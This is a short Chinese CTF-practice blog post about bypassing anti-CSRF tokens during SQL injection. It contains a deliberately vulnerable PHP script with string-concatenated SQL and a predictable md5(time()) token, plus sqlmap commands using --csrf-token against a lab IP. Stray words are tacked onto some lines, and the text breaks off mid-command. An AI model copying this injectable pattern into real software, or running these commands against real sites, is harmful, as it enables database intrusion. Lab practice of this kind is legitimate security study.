最近在准备比赛,打sqlilabs时看了一下sqlmap的wiki,发现了–csrf-token和–csrf-url的参数,因而写了个php版本的bug试了一试。
同时也了解了一下你们对csrf注入的广泛作法:sqlmap+burp正则匹配,两相比较,仍是sqlmap自带的功能比较方便。php
写一个bugmysql
CSRF的广泛防护方法是增长anti-csrf token,也就是一串不可预测的字符串。因而动手写了一个php版本防csrf的sqli脚本,这里写的并不规范,时间戳是能够被预测的,并且此脚本能够被绕过token检测,有兴趣能够琢磨一下。git
<?php session_start(); //生成随机token $token = md5(time()); //获取name参数 $name = isset($_GET['name']) ? $_GET['name']: ''; //校验token if ($_GET['token'] == $_SESSION['token']) { //执行sql语句 $mysqli = new mysqli("127.0.0.1","root","root"); $mysqli->select_db("test"); if (!$mysqli->connect_error) { $query = "select * from admin where username = '$name'"; $result = $mysqli->query($query); if (!$mysqli->error) { while ($row = $result->fetch_row()) { echo $row; } } else { echo $mysqli->error; } } else { echo $mysqli->connect_error; } $mysqli->close(); } else { echo "no token"; } //以hidden表单元素的形式输出token echo "<input type="hidden" name="token" value="$token">"; //刷新SESSION中token $_SESSION['token'] = $token; ?>
漏洞利用github
sqlmap 中有这样两个参数sql
若是没有指定–csrf-url,则默认从当前页面获取token。先来看看不指定token时,sqlmap的输出:session
sqlmap -u "http://192.168.154.134/tokensql.php?name=admin&token=123" --flush-session
sqlmap根据关键字,识别出了token参数,可是默认不获取token,没有发现注入点。app
再来看看指定token时的输出:fetch
sqlmap -u "http://192.168.154.134/tokensql.php?name=admin&token=123" --flush-session --csrf-token="token"
确认了注入的存在,而且在wireshark中观察到token被sqlmap自动更新url
在这个demo中,获取token的页面和注入点相同,在真实场景中,可能须要单独获取token值,这时要用到–csrf-url=<url>的参数。spa
因此使用如下命令,效果也是同样的:
sqlmap -u "http://192.168.154.134/tokensql.php?name=admin&token=123" --flush-session --cs